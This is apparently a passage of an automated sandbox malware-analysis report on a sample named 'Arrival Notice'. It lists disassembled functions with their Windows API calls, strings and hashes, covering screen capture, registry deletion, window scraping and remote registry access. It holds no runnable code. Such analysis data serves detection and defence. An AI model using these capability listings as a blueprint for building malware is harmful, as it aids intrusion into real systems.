                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                  • String ID: RegDeleteKeyExW$advapi32.dll
                  • API String ID: 146587525-4033151799
                  • Opcode ID: 905cb38186b4886fb3e6fc6abc20516b540d7e33c025abd112ba6e7307fc840e
                  • Instruction ID: d80ce6f621b271f687dd4637beb08d80e3933b1c58bd50d8dd338968e9883bf8
                  • Opcode Fuzzy Hash: 905cb38186b4886fb3e6fc6abc20516b540d7e33c025abd112ba6e7307fc840e
                  • Instruction Fuzzy Hash: 6DC1AD34204201AFC715DF14C495F6ABBE5EF88308F18949DF6998B7A2CB35E845CB85
                  Function 0043255C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON
                  Download Yara Rule
                  APIs
                  • GetDC.USER32(00000000), ref: 004325D8
                  • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 004325E8
                  • CreateCompatibleDC.GDI32(?), ref: 004325F4
                  • SelectObject.GDI32(00000000,?), ref: 00432601
                  • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 0043266D
                  • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 004326AC
                  • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 004326D0
                  • SelectObject.GDI32(?,?), ref: 004326D8
                  • DeleteObject.GDI32(?), ref: 004326E1
                  • DeleteDC.GDI32(?), ref: 004326E8
                  • ReleaseDC.USER32(00000000,?), ref: 004326F3
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                  • String ID: (
                  • API String ID: 2598888154-3887548279
                  • Opcode ID: 69a02940c77d26e0be1c3ca4232908ed0415641ba619e13b92e267fe8c31c3ad
                  • Instruction ID: d96ce92d35bfd5034dfec326dbadd6787b33543ea4dc21b2e5abceb615f65963
                  • Opcode Fuzzy Hash: 69a02940c77d26e0be1c3ca4232908ed0415641ba619e13b92e267fe8c31c3ad
                  • Instruction Fuzzy Hash: BE611175D00219EFCF04CFA8D985AAEBBB6FF48310F24842AE955A7250D774A941CFA4
                  Function 003EDA5D Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • ___free_lconv_mon.LIBCMT ref: 003EDAA1
                    • Part of subcall function 003ED63C: _free.LIBCMT ref: 003ED659
                    • Part of subcall function 003ED63C: _free.LIBCMT ref: 003ED66B
                    • Part of subcall function 003ED63C: _free.LIBCMT ref: 003ED67D
                    • Part of subcall function 003ED63C: _free.LIBCMT ref: 003ED68F
                    • Part of subcall function 003ED63C: _free.LIBCMT ref: 003ED6A1
                    • Part of subcall function 003ED63C: _free.LIBCMT ref: 003ED6B3
                    • Part of subcall function 003ED63C: _free.LIBCMT ref: 003ED6C5
                    • Part of subcall function 003ED63C: _free.LIBCMT ref: 003ED6D7
                    • Part of subcall function 003ED63C: _free.LIBCMT ref: 003ED6E9
                    • Part of subcall function 003ED63C: _free.LIBCMT ref: 003ED6FB
                    • Part of subcall function 003ED63C: _free.LIBCMT ref: 003ED70D
                    • Part of subcall function 003ED63C: _free.LIBCMT ref: 003ED71F
                    • Part of subcall function 003ED63C: _free.LIBCMT ref: 003ED731
                  • _free.LIBCMT ref: 003EDA96
                    • Part of subcall function 003E29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,003ED7D1,00000000,00000000,00000000,00000000,?,003ED7F8,00000000,00000007,00000000,?,003EDBF5,00000000), ref: 003E29DE
                    • Part of subcall function 003E29C8: GetLastError.KERNEL32(00000000,?,003ED7D1,00000000,00000000,00000000,00000000,?,003ED7F8,00000000,00000007,00000000,?,003EDBF5,00000000,00000000), ref: 003E29F0
                  • _free.LIBCMT ref: 003EDAB8
                  • _free.LIBCMT ref: 003EDACD
                  • _free.LIBCMT ref: 003EDAD8
                  • _free.LIBCMT ref: 003EDAFA
                  • _free.LIBCMT ref: 003EDB0D
                  • _free.LIBCMT ref: 003EDB1B
                  • _free.LIBCMT ref: 003EDB26
                  • _free.LIBCMT ref: 003EDB5E
                  • _free.LIBCMT ref: 003EDB65
                  • _free.LIBCMT ref: 003EDB82
                  • _free.LIBCMT ref: 003EDB9A
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                  • String ID:
                  • API String ID: 161543041-0
                  • Opcode ID: dfe2c66552ff8a66f47ea04dbc537829d669105159cede4358d4b62083e33d3f
                  • Instruction ID: f94065acbd2c925ef3999e71976fdba980bcf8789b84b95fab7f897bf12d7856
                  • Opcode Fuzzy Hash: dfe2c66552ff8a66f47ea04dbc537829d669105159cede4358d4b62083e33d3f
                  • Instruction Fuzzy Hash: C5316F316043A99FDB23AA3AD846B5B77E9FF01310F125629F458DB1D2EF35AD508720
                  Function 0041365B Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 267windowtimeCOMMON
                  Download Yara Rule
                  APIs
                  • GetClassNameW.USER32(?,?,00000100), ref: 0041369C
                  • _wcslen.LIBCMT ref: 004136A7
                  • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00413797
                  • GetClassNameW.USER32(?,?,00000400), ref: 0041380C
                  • GetDlgCtrlID.USER32(?), ref: 0041385D
                  • GetWindowRect.USER32(?,?), ref: 00413882
                  • GetParent.USER32(?), ref: 004138A0
                  • ScreenToClient.USER32(00000000), ref: 004138A7
                  • GetClassNameW.USER32(?,?,00000100), ref: 00413921
                  • GetWindowTextW.USER32(?,?,00000400), ref: 0041395D
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
                  • String ID: %s%u
                  • API String ID: 4010501982-679674701
                  • Opcode ID: b06b9f1437c4a14d71a3d8dc3e5a0014ca797501eb74af42a428bc598df48f64
                  • Instruction ID: 2341b9ada94a190add2e63f0e95dd516fa72ce6ff127a8acff63d68ea6d8e2fc
                  • Opcode Fuzzy Hash: b06b9f1437c4a14d71a3d8dc3e5a0014ca797501eb74af42a428bc598df48f64
                  • Instruction Fuzzy Hash: 5591D3B1204606AFD719DF24C885FEBF7A8FF44341F00852AF999D6290DB34EA85CB95
                  Function 00414954 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 253COMMON
                  Download Yara Rule
                  APIs
                  • GetClassNameW.USER32(?,?,00000400), ref: 00414994
                  • GetWindowTextW.USER32(?,?,00000400), ref: 004149DA
                  • _wcslen.LIBCMT ref: 004149EB
                  • CharUpperBuffW.USER32(?,00000000), ref: 004149F7
                  • _wcsstr.LIBVCRUNTIME ref: 00414A2C
                  • GetClassNameW.USER32(00000018,?,00000400), ref: 00414A64
                  • GetWindowTextW.USER32(?,?,00000400), ref: 00414A9D
                  • GetClassNameW.USER32(00000018,?,00000400), ref: 00414AE6
                  • GetClassNameW.USER32(?,?,00000400), ref: 00414B20
                  • GetWindowRect.USER32(?,?), ref: 00414B8B
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                  • String ID: ThumbnailClass
                  • API String ID: 1311036022-1241985126
                  • Opcode ID: 45b650aadd7690940f2c4dd4bd4ac36bf83b8e895d9f97c4eb5e7f5eddd56c42
                  • Instruction ID: 01c923fcd89dcf94cf9cb7ac11bb4dcebcb8235a9bcb3fdebaba8a6ce5771045
                  • Opcode Fuzzy Hash: 45b650aadd7690940f2c4dd4bd4ac36bf83b8e895d9f97c4eb5e7f5eddd56c42
                  • Instruction Fuzzy Hash: 7C91BE711082059BDB04CF14C985BEB77E8FF84354F04846BFD899A295EB38ED85CBA9
                  Function 0043CC34 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON
                  Download Yara Rule
                  APIs
                  • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0043CC64
                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 0043CC8D
                  • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0043CD48
                    • Part of subcall function 0043CC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 0043CCAA
                    • Part of subcall function 0043CC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 0043CCBD
                    • Part of subcall function 0043CC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0043CCCF
                    • Part of subcall function 0043CC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0043CD05
                    • Part of subcall function 0043CC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0043CD28
                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 0043CCF3
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                  • String ID: RegDeleteKeyExW$advapi32.dll
                  • API String ID: 2734957052-4033151799
                  • Opcode ID: 98530701ea9a65106bb80b569644ad5f4caed7231737b345f70c80d8ef9e2d04
                  • Instruction ID: ad6ca0703cc090fe6ebbb995a193c515a659fa161bb3e7a8ab224b2612a68b9a
                  • Opcode Fuzzy Hash: 98530701ea9a65106bb80b569644ad5f4caed7231737b345f70c80d8ef9e2d04
                  • Instruction Fuzzy Hash: 5A318075902128BBD7209B91DCC8EFFBB7CEF0A740F041176B905E2240DA389A45DBA8
                  Function 0041E6B0 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                  Download Yara Rule
                  APIs
                  • timeGetTime.WINMM ref: 0041E6B4
                    • Part of subcall function 003CE551: timeGetTime.WINMM(?,?,0041E6D4), ref: 003CE555
                  • Sleep.KERNEL32(0000000A), ref: 0041E6E1
                  • EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 0041E705
                  • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0041E727
                  • SetActiveWindow.USER32 ref: 0041E746
                  • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 0041E754
                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 0041E773
                  • Sleep.KERNEL32(000000FA), ref: 0041E77E
                  • IsWindow.USER32 ref: 0041E78A
                  • EndDialog.USER32(00000000), ref: 0041E79B
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                  • String ID: BUTTON
                  • API String ID: 1194449130-3405671355
                  • Opcode ID: 1c36de8fb98fcc66ad7f90f97678102d8791877524dc0c8789665b3c32f60199
                  • Instruction ID: 6b11648396dbfd6ef932fcbb744d14d4e0515041f644f2c6525a208fddd900ce
                  • Opcode Fuzzy Hash: 1c36de8fb98fcc66ad7f90f97678102d8791877524dc0c8789665b3c32f60199
                  • Instruction Fuzzy Hash: 4821A77C201200AFFB015F21EDC9E6A3BA9F756349F58483AFC15A12B1EBB59C409B1C
                  Function 0041E9FC Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 003B9CB3: _wcslen.LIBCMT ref: 003B9CBD
                  • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0041EA5D
                  • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0041EA73
                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0041EA84
                  • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0041EA96
                  • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0041EAA7
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: SendString$_wcslen
                  • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                  • API String ID: 2420728520-1007645807
                  • Opcode ID: d81190b106391d49503c837c88507129264e62dd92184da8a82fdfae95eb0c8f
                  • Instruction ID: 579d83a8427f81d1fa5e2947d01d9d556504fae058a51724066a2af1585af3c6
                  • Opcode Fuzzy Hash: d81190b106391d49503c837c88507129264e62dd92184da8a82fdfae95eb0c8f
                  • Instruction Fuzzy Hash: B811E7B4A4022979D710A362DC4AEFF7E7CEFC1F44F10042BBA05A60D1DE740944C5B4
                  Function 00415CC6 Relevance: 18.2, APIs: 12, Instructions: 173COMMON
                  Download Yara Rule
                  APIs
                  • GetDlgItem.USER32(?,00000001), ref: 00415CE2
                  • GetWindowRect.USER32(00000000,?), ref: 00415CFB
                  • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00415D59
                  • GetDlgItem.USER32(?,00000002), ref: 00415D69
                  • GetWindowRect.USER32(00000000,?), ref: 00415D7B
                  • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00415DCF
                  • GetDlgItem.USER32(?,000003E9), ref: 00415DDD
                  • GetWindowRect.USER32(00000000,?), ref: 00415DEF
                  • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00415E31
                  • GetDlgItem.USER32(?,000003EA), ref: 00415E44
                  • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00415E5A
                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00415E67
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Window$ItemMoveRect$Invalidate
                  • String ID:
                  • API String ID: 3096461208-0
                  • Opcode ID: 7940b8f02f0c532e825fe540b0389b85e853fd4708ca809e1878983b37706bbc
                  • Instruction ID: e56bd4ccc2b721c879f8eecd18ea1a53bf178293f7ee27402d5b9bfc103e164f
                  • Opcode Fuzzy Hash: 7940b8f02f0c532e825fe540b0389b85e853fd4708ca809e1878983b37706bbc
                  • Instruction Fuzzy Hash: 00512D74B00605AFDF18DFA8DD89AEEBBB5FB89300F148129F915E6290D7749E40CB54
                  Function 003C8BCD Relevance: 18.2, APIs: 12, Instructions: 168timeCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 003C8F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,003C8BE8,?,00000000,?,?,?,?,003C8BBA,00000000,?), ref: 003C8FC5
                  • DestroyWindow.USER32(?), ref: 003C8C81
                  • KillTimer.USER32(00000000,?,?,?,?,003C8BBA,00000000,?), ref: 003C8D1B
                  • DestroyAcceleratorTable.USER32(00000000), ref: 00406973
                  • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,003C8BBA,00000000,?), ref: 004069A1
                  • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,003C8BBA,00000000,?), ref: 004069B8
                  • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,003C8BBA,00000000), ref: 004069D4
                  • DeleteObject.GDI32(00000000), ref: 004069E6
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                  • String ID:
                  • API String ID: 641708696-0
                  • Opcode ID: f7893e6ecc156539d6cad273d5b7c9c656d1f78047db88f992189466d630d67b
                  • Instruction ID: bd2fea2927d2fc392ecdb67dafcfffc1eee3d09c5e8e692e03b8e7a3cbd8c871
                  • Opcode Fuzzy Hash: f7893e6ecc156539d6cad273d5b7c9c656d1f78047db88f992189466d630d67b
                  • Instruction Fuzzy Hash: 11618071102600DFDB269F14D948B2AB7B5FB41312F15893EE0439AAB0CB39AE91DF58
                  Function 003C9838 Relevance: 18.1, APIs: 12, Instructions: 137COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 003C9944: GetWindowLongW.USER32(?,000000EB), ref: 003C9952
                  • GetSysColor.USER32(0000000F), ref: 003C9862
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: ColorLongWindow
                  • String ID:
                  • API String ID: 259745315-0
                  • Opcode ID: 1d5d6076a8ae62d42bdd63654d82e11d99144c0ecfa87f025269f3f89e62e8d6
                  • Instruction ID: b1bfacbc87eaab2c79f8ca0652205627b4b8821e176b4fb900dd2e864aae4590
                  • Opcode Fuzzy Hash: 1d5d6076a8ae62d42bdd63654d82e11d99144c0ecfa87f025269f3f89e62e8d6
                  • Instruction Fuzzy Hash: 7E41D635501750AFDB215F389C88FBA37A5AB07331F1A462AF9A2D72E2C7309D42DB15
                  Function 004196E2 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON
                  Download Yara Rule
                  APIs
                  • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,003FF7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 00419717
                  • LoadStringW.USER32(00000000,?,003FF7F8,00000001), ref: 00419720
                    • Part of subcall function 003B9CB3: _wcslen.LIBCMT ref: 003B9CBD
                  • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,003FF7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 00419742
                  • LoadStringW.USER32(00000000,?,003FF7F8,00000001), ref: 00419745
                  • MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 00419866
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: HandleLoadModuleString$Message_wcslen
                  • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                  • API String ID: 747408836-2268648507
                  • Opcode ID: db026e6bec677e50fe8c4cfc940488339e7d8ed22056f70ab1aadc269013512e
                  • Instruction ID: c0596ef889d51eb8d61c7293ae2ad8557a9ff8ead12e91d10f2172fd9c70e6ff
                  • Opcode Fuzzy Hash: db026e6bec677e50fe8c4cfc940488339e7d8ed22056f70ab1aadc269013512e
                  • Instruction Fuzzy Hash: DD417172800219AACB05FBE0CD96EEE7779AF15304F640066F70576092EB396F48CB65
                  Function 004106DE Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 003B6B57: _wcslen.LIBCMT ref: 003B6B6A
                  • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 004107A2
                  • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 004107BE
                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 004107DA
                  • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00410804
                  • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 0041082C
                  • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00410837
                  • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0041083C
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                  • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                  • API String ID: 323675364-22481851
                  • Opcode ID: 26ec08e7fbe5cd99857140d12263e0e456536237221b19dd31770612b57f1ab6
                  • Instruction ID: 60d3ce24a0b852974644e49fc750c42978c1eca97295c0fa914bba1f7bcc1ddd
                  • Opcode Fuzzy Hash: 26ec08e7fbe5cd99857140d12263e0e456536237221b19dd31770612b57f1ab6
                  • Instruction Fuzzy Hash: CD414B76C00628ABDF11EFA4DC95DEEB778FF04344F14412AEA05AB1A1EB749E44CB90
                  Function 00433C30 Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON
                  Download Yara Rule
                  APIs
                  • VariantInit.OLEAUT32(?), ref: 00433C5C
                  • CoInitialize.OLE32(00000000), ref: 00433C8A
                  • CoUninitialize.OLE32 ref: 00433C94
                  • _wcslen.LIBCMT ref: 00433D2D
                  • GetRunningObjectTable.OLE32(00000000,?), ref: 00433DB1
                  • SetErrorMode.KERNEL32(00000001,00000029), ref: 00433ED5
                  • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00433F0E
                  • CoGetObject.OLE32(?,00000000,0044FB98,?), ref: 00433F2D
                  • SetErrorMode.KERNEL32(00000000), ref: 00433F40
                  • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00433FC4
                  • VariantClear.OLEAUT32(?), ref: 00433FD8
                  Memory Dump Source
